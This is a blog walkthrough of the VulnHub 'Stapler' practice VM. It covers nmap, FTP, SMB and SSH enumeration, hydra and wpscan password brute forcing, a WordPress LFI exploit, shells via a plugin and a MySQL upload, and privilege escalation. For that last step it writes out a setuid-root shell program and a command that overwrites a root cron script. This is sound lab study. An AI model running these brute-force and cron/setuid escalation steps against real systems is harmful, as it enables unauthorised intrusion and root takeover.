In reviewing multiple blogs and websites, Stapler is reported to be one of several vulnerable systems that are supposed to assist penetration testers with challenges similar to Offensive Security’s PWK coursework. My goal is to complete these challenges and document my findings along the way.

Setup:

I downloaded the Stapler Zip file from VulnHub.com and then extracted the contents to my local disk. I had issues with importing the OVA file into my instance of VMWare on my Ubuntu 16.04 Workstation host. So, I imported the OVA file into VirtualBox after I renamed the Stapler.mf to Stapler.mf.old.

Victim Description:

The VulnHub.com site did not list any vulnerabilities, but it did note there was a text flag. The Description section noted that there were two paths to a limited shell and three paths to obtain root. I have included the vulnerabilities that I found below:

Information Gathering:

Since I knew the isolated network IP Address range, I used Nmap to perform a host discovery scan of the 172.27.254.0/24 subnet.

nmap -sn -n 172.27.254.0/24

Next, I used the Nmap command to perform a port scan, probing all TCP ports, OS detection, and then outputting the findings into three different file formats starting with the name of NmapFullScan.

FTP Enumeration:

Identifying vSFTP was utilizing Port 21, I decided to test access by using an anonymous FTP login.

Truncated passwd file

SSH Enumeration:

Using the information from the Nmap scan, I decided to connect to the system with SSH. Based on the banner, there appears to be a user named Barry.

hydra -L sshusers -P /pentest/password-recovery/SecLists/Passwords/darkc0de.txt -e nsr 172.27.254.41 ssh

I waited a few minutes, but did not have any positive results. So, I decided to continue to enumerate the system based on the other protocols found with Nmap.

SMB Enumeration:

Once again, using the information from the Nmap scan, I decided to launch enum4linux to perform all scanning on the Stapler host and output the content to a file named enum_41.txt.

Port 666 Enumeration:

Using the information from the Nmap scan, I decided to launch netcat to connect to TCP Port 666 on the Stapler system.

Web Enumeration:

Continuing with Nmap, I used the vuln NSE script and then output the findings into three different file formats starting with the name of NmapVulnScan.

sudo wpscan — url https://172.27.254.41:12380/blogblog/ — enumerate u,ap — disable-tls-checks — log /home/ptester/Stapler/wpscan_41.txt

WPScan: Plugins
WPScan: Enumerated Users
WPScan: Enumerated Users 10–20

WordPress Exploit:

Researching the WordPress plugins for vulnerabilities, I found that the Exploit-DB website noted a LFI with the embedded Advanced Video plugin. So, I downloaded the exploit and made the modifications for the blogblog URL.

import ssl

ssl._create_default_https_context = ssl._create_unverified_context

With the modification, the script ran without issue. Great, but now what?

MySQL Enumeration:

Using the root credentials found within .jpeg file, I use the MySQL client to enumerate the databases on Stapler.

WordPress Brute Force:

Prior to the executing the WordPress Exploit, I created a wp_users.txt file with the enumerated WordPress accounts. I then issued the wpscan command to brute force the wp_users.txt against the rockyou.txt dictionary and then output the findings into the wp_creds.txt file.

sudo wpscan — url https://172.27.254.41:12380/blogblog/ — disable-tls-checks — usernames /home/ptester/Stapler/wp_users.txt — wordlist /pentest/password-recovery/dictionary/Passwords/Leaked-Databases/rockyou.txt — log /home/ptester/Stapler/wp_creds.txt

In less than 30 minutes, I was able to obtain the credentials for john.

Remote Shell:

As previously noted, there were two paths to a limited shell. So, I documented both of the methods that I used.

Method 1 — WordPress Plugin:

Since the john account was listed as the first account, from the wpscan enumeration, I thought that the account may have been the admin account. So, I returned to the browser and entered the credentials.

Method 2 — MySQL, SELECT Statement:

In researching uploading shells with MySQL and PHPAdmin, I wanted to try to use a SELECT statement to upload a basic shell to the blogblog/wp-content/uploads/directory. So, I connected to the system with MySQL.

Local Information Gathering and Enumeration:

First things first, I issued the uname -mra && cat /etc/*release* commands to gather information about the system.

Privilege Escalation:

As previously noted, there were three paths to root the system. So, I documented the methods that I used.

Method 1 — Stored Password:

Having credentials for SSH, I opened a terminal and launched SSH with the JKanode account. Unfortunately, this account was not able to authenticate. However, I was able to successfully authenticate with the peter account.

Method 2 — Kernel Exploit:

Knowing the OS and Kernel versions, I launched searchsploit to perform a web search for Ubuntu 16.04.

wget on Stapler
SimpleHTTPServer on second attacking system

Method 3 — Cron Job:

I have to admit that I had to research this method and review a few other posts prior to figuring this one out. In addition, I found a useful enumeration tool by Mike Czumak called linuxprivchecker. Although, the amount of information was a little overwhelming for me at first.

echo ‘int main(void)

{

setgid(0);

setuid(0);

execl(“/bin/sh”, “sh”, 0);

}’ > rootpriv.c

I used the cat command to validate the newly created file.

echo ‘chown root:root /tmp/rootpriv; chmod u+s /tmp/rootpriv;’ > /usr/local/sbin/cron-logrotate.sh

Using the cat command, I validated the newly created contents within the cron-logratoate.sh script.

Flag:

Having obtained root privileges (from Method 1), I issued the command sudo ls -al /root to view the contents of the root directory.

Cyber Security Enthusiast

Cyber Security Enthusiast